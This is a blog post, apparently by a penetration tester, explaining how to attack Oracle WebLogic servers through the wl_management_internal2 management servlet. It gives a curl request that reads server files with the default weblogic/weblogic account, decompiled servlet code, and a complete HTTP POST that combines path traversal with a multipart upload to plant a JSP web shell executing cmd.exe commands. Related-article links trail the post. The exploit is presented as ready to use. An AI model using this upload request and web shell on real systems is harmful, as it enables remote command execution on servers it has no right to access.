WebLogic undocumented hacking

简介: During an external pentest – what a surprise – I found a WebLogic server with no interesting contents.

During an external pentest – what a surprise – I found a WebLogic server with no interesting contents. I searched papers and tutorials about WebLogic hacking with little success. The public exploitation techniques resulted in only file reading. The OISSG tutorial only shows the following usable file reading solution:

curl -s http://127.0.0.1/wl_management_internal2/wl_management -H "username: 
weblogic" -H "password: weblogic" -H "wl_request_type: file" 
-H "file_name: c:\boot.ini"

You can read the WAR, CLASS, XML(config.xml) and LOG(logs\WeblogicServer.log) files through this vulnerability.
This is not enough because I want run operating system commands. The HACKING EXPOSED WEB APPLICATIONS, 3rd Edition book mentioned an attack scenario against WebLogic, but this was only file read although it was based on a great idea:
The web.xml of wl_management_internal2 defined two servlets, FileDistributionServlet and BootstrapServlet. I downloaded the weblogic.jar file with the mentioned attack and decompiled the FileDistributionServlet.class:

total 128
drwxr-xr-x  2 root root  4096 2014-10-03 14:54 ./
drwxr-xr-x 24 root root  4096 2004-06-29 23:18 ../
-rw-r--r--  1 root root  7073 2004-06-29 23:17 BootstrapServlet$1.class
-rw-r--r--  1 root root  8876 2004-06-29 23:17 BootstrapServlet.class
-rw-r--r--  1 root root  1320 2004-06-29 23:17 BootstrapServlet$MyCallbackHandler.class
-rw-r--r--  1 root root  1033 2004-06-29 23:16 FileDistributionServlet$1.class
-rw-r--r--  1 root root  1544 2004-06-29 23:16 FileDistributionServlet$2.class
-rw-r--r--  1 root root   945 2004-06-29 23:16 FileDistributionServlet$3.class
-rw-r--r--  1 root root   956 2004-06-29 23:16 FileDistributionServlet$4.class
-rw-r--r--  1 root root   927 2004-06-29 23:16 FileDistributionServlet$5.class
-rw-r--r--  1 root root   950 2004-06-29 23:16 FileDistributionServlet$6.class
-rw-r--r--  1 root root 21833 2004-06-29 23:16 FileDistributionServlet.class
-rw-r--r--  1 root root   364 2004-06-29 23:16 FileDistributionServlet$FileNotFoundHandler.class
-rw-r--r--  1 root root 38254 2014-10-03 12:24 FileDistributionServlet.jad
-rw-r--r--  1 root root  1378 2004-06-29 23:16 FileDistributionServlet$MyCallbackHandler.class
root@s2crew:/

The FileDistributionServlet had the following interesting function:

 private void internalDoPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
        throws ServletException, IOException
    {
        String s;
        String s1;
        InputStream inputstream;
        boolean flag;
        String s2;
        String s3;
        boolean flag1;
        s = httpservletrequest.getHeader("wl_request_type");
        httpservletresponse.addHeader("Version", String.valueOf(Admin.getInstance().getCurrentVersion()));
        s1 = httpservletrequest.getContentType();
        inputstream = null;
        Object obj = null;
        flag = true;
        s2 = null;
        s3 = httpservletrequest.getHeader("wl_upload_application_name");
        flag1 = "false".equals(httpservletrequest.getHeader("archive"));
        Object obj1 = null;
        String s4 = null;
        if(s3 != null)
        {
            ApplicationMBean applicationmbean;
            try
            {
                MBeanHome mbeanhome = Admin.getInstance().getMBeanHome();
                applicationmbean = (ApplicationMBean)mbeanhome.getAdminMBean(s3, "Application");
            }
            catch(InstanceNotFoundException instancenotfoundexception)
            {
                applicationmbean = null;
            }
            if(applicationmbean != null)
            {
                File file = new File(applicationmbean.getFullPath());
                s4 = file.getParent();
            }
        }
        if(s4 == null)
        {
            s4 = Admin.getInstance().getLocalServer().getUploadDirectoryName() + File.separator;
            if(s3 != null)
                s4 = s4.concat(s3 + File.separator);
        }
        Object obj2 = null;
        if(s1 != null && s1.startsWith("multipart") && s.equals("wl_upload_request"))
        {
            httpservletresponse.setContentType("text/plain");
            Object obj3 = null;
            try
            {
                MultipartRequest multipartrequest;
                if(httpservletrequest.getHeader("jspRefresh") != null && httpservletrequest.getHeader("jspRefresh").equals("true"))
                {
                    s2 = httpservletrequest.getHeader("adminAppPath");
                    multipartrequest = new MultipartRequest(httpservletrequest, s2, 0x7fffffff);
                } else
                {
                    multipartrequest = new MultipartRequest(httpservletrequest, s4, 0x7fffffff);
                }
                File file1 = multipartrequest.getFile((String)multipartrequest.getFileNames().nextElement());
                s2 = file1.getPath();
                flag = false;
                if(flag1)
                {
                    String s5 = s2.substring(0, s2.lastIndexOf("."));
                    extractArchive(s2, s5);
                    s2 = s5;
                }
----- CUT ------

After the investigating the function, I constructed the following HTTP POST request:

POST /wl_management_internal2/wl_management HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0
Connection: keep-alive
username: weblogic
password: weblogic
wl_request_type: wl_upload_request
wl_upload_application_name: ..\..\..\..\..\..\..\..\..\you_can_define_the_upload_directory
archive: true
Content-Length: XXXX
Content-Type: multipart/form-data; boundary=---------------------------55365303813990412251182616919
Content-Length: 959
-----------------------------55365303813990412251182616919
Content-Disposition: form-data; name="file"; filename="cmdjsp.jsp"
Content-Type: application/octet-stream
// note that linux = cmd and windows = "cmd.exe /c + cmd" 
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
            output += s;
         }
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>
<%=output %>
<!--    http://michaeldaw.org   2006    -->
-----------------------------55365303813990412251182616919--

This is simple as that. The prerequisite of this exploit is the default weblogic/weblogic account.
This is what I call real hacking!

;)

目录
相关文章
|
4月前
|
Java 应用服务中间件 Linux
centos7安装weblogic
centos7安装weblogic
124 1
|
负载均衡 Java 应用服务中间件
Weblogic的了解、安装及其使用(三)
Weblogic的了解、安装及其使用
1488 0
|
Oracle Java 关系型数据库
Weblogic的了解、安装及其使用(二)
Weblogic的了解、安装及其使用
1079 0
|
开发框架 Kubernetes 监控
Weblogic的了解、安装及其使用(一)
Weblogic的了解、安装及其使用
2811 0
|
安全 Oracle Java
Oracle Weblogic--CentOS Linux 8.5.2安装weblogic11G
Weblogic在centos上详细安装步骤及安装过程中可能遇到的问题
351 0
Oracle Weblogic--CentOS Linux 8.5.2安装weblogic11G
|
Oracle 关系型数据库 Java
EOS Platform 7.2下安装weblogic插件
在实际工作中,需要用到EOS Platform,这是一个基于Eclipse的开发工具,自带了Tomcat,可以满足大部分需要,但是有时候需要使用Weblogic,这就得手动安装Weblogic插件了。这个过程与Eclipse相同(Eclipse下安装weblogic插件),本文中在EOS Platform 7.2中安装Weblogic插件。
204 0
EOS Platform 7.2下安装weblogic插件
|
Oracle 关系型数据库 Java
Eclipse下安装weblogic插件
安装好weblogic dev版本(Windows下安装weblogic dev版本),可以在Eclipse中安装weblogic server tools插件,直接连接到weblogic server,发布、部署、调试都变得简单些。
709 0
Eclipse下安装weblogic插件
|
Oracle 关系型数据库 Java
Windows下安装weblogic dev版本
在开发过程中,有一种情况是比较尴尬的:需要用到某个软件,但是只需要用到这个软件中的一小部分功能,这样既浪费的磁盘空间,又浪费了CPU空间。比如Weblogic,完整版包括很多功能,但是开发过程中,只是需要创建数据源、部署项目,然后进行测试即可。所以开发过程中,需要一款简化的Weblogic(Weblogic开发版)是挺有必要的(如果电脑配置比较壕,也可以任性的使用完整版)。
339 0
Windows下安装weblogic dev版本
|
XML SQL 开发框架
Weblogic安装与配置详解
Weblogic安装与配置用Eclipse MyEclipse WebLogic8.1开发第一个Web程序1.安装jreEclipse虽然由java开发,但本身并不自带jre。所以你必须先自己安装,去http://java.sun.com/downloads下载最新J2SE1.4.2_03的jre安装文件j2re-1_4_2_03-windows-i586-p.exe。安装成功后,重启机器,并将jre的bin文件夹路径添加到系统环境变量PATH中,如:C:\Program Files\Java\j2re1.4.2_03\bin。
459 0
|
Java Linux 应用服务中间件
Linux安装weblogic服务
Linux安装weblogic服务 一、环境准备: Linux系统 jdk-7u75-linux-x64.tar.gz(http://pan.baidu.com/s/1kTh5Vx1) wls1212_dev.zip(http://pan.baidu.com/s/1nttDkq1) 二、安装步骤: 1、首先创建weblogic用户、用户组并设置主目录 [root@localhost ~]# useradd -d /weblogic weblogic [root@localhost ~]# passwd weblogic 更改用户 weblogic 的密码。
2843 0